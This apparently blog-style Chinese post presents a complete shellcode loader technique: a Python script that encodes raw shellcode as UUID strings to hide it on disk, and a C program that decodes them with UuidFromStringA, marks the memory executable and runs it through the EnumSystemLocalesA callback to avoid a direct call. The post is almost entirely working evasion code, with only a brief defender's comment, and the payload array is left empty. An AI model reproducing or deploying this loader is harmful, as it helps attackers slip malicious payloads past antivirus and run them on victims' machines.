Shellcode to UUID
前几天的推:https://twitter.com/ajpc500/status/1353403938414993408?s=09
思路很奇特，重点在于滥用合法 API：先用 UuidFromStringA 把 UUID 字符串还原成 shellcode 字节，再借 EnumSystemLocalesA 的回调机制执行，全程不出现对 shellcode 指针的直接调用（示例代码中直接调用那一行被注释掉了）。
Py Script
import uuid
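# Turn a raw shellcode blob into a C array of UUID strings. The UUIDs only
# obfuscate the bytes on disk: the loader (see the C example) decodes them
# back with UuidFromStringA, so the payload is fully visible in memory again
# at runtime.

UUID_SIZE = 16  # a UUID/GUID struct is exactly 16 bytes
PAD_BYTE = b"\x90"  # x86 NOP; pick a different filler for other architectures


def pad_to_uuid_boundary(data: bytes, fill: bytes = PAD_BYTE) -> bytes:
    """Right-pad *data* with *fill* up to a multiple of 16 bytes.

    The original script computed the padded length but discarded the result
    of ``ljust()`` (bytes are immutable), so the UUID count was derived from
    the unpadded length and any trailing partial chunk was silently dropped.
    """
    aligned = -(-len(data) // UUID_SIZE) * UUID_SIZE  # round up
    return data.ljust(aligned, fill)


def shellcode_to_uuids(data: bytes) -> list[str]:
    """Split *data* into 16-byte chunks and render each as a UUID string.

    Raises ``ValueError`` on empty input (the generated C array would be
    empty and not compile). ``bytes_le`` is used because it matches the
    in-memory layout of a Windows UUID/GUID struct (Data1..Data3 in
    little-endian order), which is what ``UuidFromStringA`` writes when the
    loader parses the string back, so the decoded bytes come out in the
    original order.
    """
    if not data:
        raise ValueError("shellcode is empty")
    padded = pad_to_uuid_boundary(data)
    return [
        str(uuid.UUID(bytes_le=padded[off:off + UUID_SIZE]))
        for off in range(0, len(padded), UUID_SIZE)
    ]


def format_c_array(uuids: list[str], name: str = "shellcode_uuid") -> str:
    """Render *uuids* as a ``const char *name[]`` C initializer.

    The layout is kept byte-for-byte identical to the original generator: a
    tab before each pair, two strings per line, ``", "`` between entries and
    a trailing backslash-newline after every pair except the last. The
    backslashes are only required inside a ``#define``; they are harmless in
    a plain array initializer.
    """
    parts = [f"const char *{name}[] = {{ \n"]
    last = len(uuids) - 1
    for i, u in enumerate(uuids):
        if i % 2 == 0:
            parts.append("\t")
        parts.append(f'"{u}"')
        if i != last:
            parts.append(", ")
            if i % 2 == 1:
                parts.append(" \\\n")
    parts.append(" \n};")
    return "".join(parts)


def main(src: str = "shellcode.bin", dst: str = "shellcode_uuid.txt") -> None:
    """Read *src*, write the C array declaration to *dst*, print a marker."""
    with open(src, "rb") as f:
        shellcode = f.read()
    uuid_list = shellcode_to_uuids(shellcode)
    with open(dst, "wt", encoding="utf-8") as f:
        f.write(format_c_array(uuid_list))
    print("done...")


if __name__ == "__main__":
    main()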
Example
#include <Windows.h>
#include <rpcdce.h>
#include <stdlib.h>
#pragma comment(lib, "Rpcrt4.lib")
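// Generated by the Python script above. shellcode_uuid.txt already contains
// the complete declaration, so it can be pasted here or pulled in with
// #include "shellcode_uuid.txt". Keep the UUIDs in order: each one decodes to
// the next 16 bytes of the payload. (The original listing was missing the
// terminating semicolon.)
const char *shellcode_uuid[] = {
    // shellcode uuids...
};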
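// Decode the UUID strings back into raw shellcode in a private RW buffer,
// flip it to RX, and enter it through a Windows callback API instead of a
// direct call. UuidFromStringA writes each GUID in its native in-memory
// layout, which is why the generator used uuid.UUID(bytes_le=...).
// Defender's note: the UUID text only hides the payload on disk; after the
// decode loop the bytes are plainly visible in memory, and the RW->RX flip
// followed by a callback into non-image memory are the observable events.
int main(void)
{
    size_t uuid_count = sizeof(shellcode_uuid) / sizeof(shellcode_uuid[0]);
    // Each UUID decodes to exactly one 16-byte UUID struct. Size the buffer
    // from the array: the original hard-coded 0x1000 bytes and wrote past the
    // end of the allocation for any payload larger than 4 KiB.
    size_t buf_len = uuid_count * sizeof(UUID);
    if (uuid_count == 0) {
        return -1;
    }
    void *buf = VirtualAlloc(NULL, buf_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (buf == NULL) {
        return -1;
    }
    // write shellcode to buffer
    BYTE *ptr = (BYTE *)buf;
    for (size_t i = 0; i < uuid_count; i++, ptr += sizeof(UUID)) {
        RPC_STATUS status = UuidFromStringA((RPC_CSTR)shellcode_uuid[i], (UUID *)ptr);
        if (status != RPC_S_OK) {
            VirtualFree(buf, 0, MEM_RELEASE);
            return -1;
        }
    }
    DWORD old_protect;
    // RW -> RX rather than allocating RWX up front; bail out if the flip fails
    // instead of jumping into a non-executable page.
    if (!VirtualProtect(buf, buf_len, PAGE_EXECUTE_READ, &old_protect)) {
        VirtualFree(buf, 0, MEM_RELEASE);
        return -1;
    }
    // ((void (*)())buf)();   // direct call, kept for reference
    // EnumSystemLocalesA treats the buffer as its LOCALE_ENUMPROCA callback,
    // so the payload is entered from inside a legitimate API. The callback is
    // documented to be called once per locale until it returns FALSE, so the
    // payload may run more than once if it returns TRUE -- confirm against the
    // shellcode's epilogue.
    EnumSystemLocalesA((LOCALE_ENUMPROCA)buf, 0);
    VirtualFree(buf, 0, MEM_RELEASE);
    system("pause");
    return 0;
}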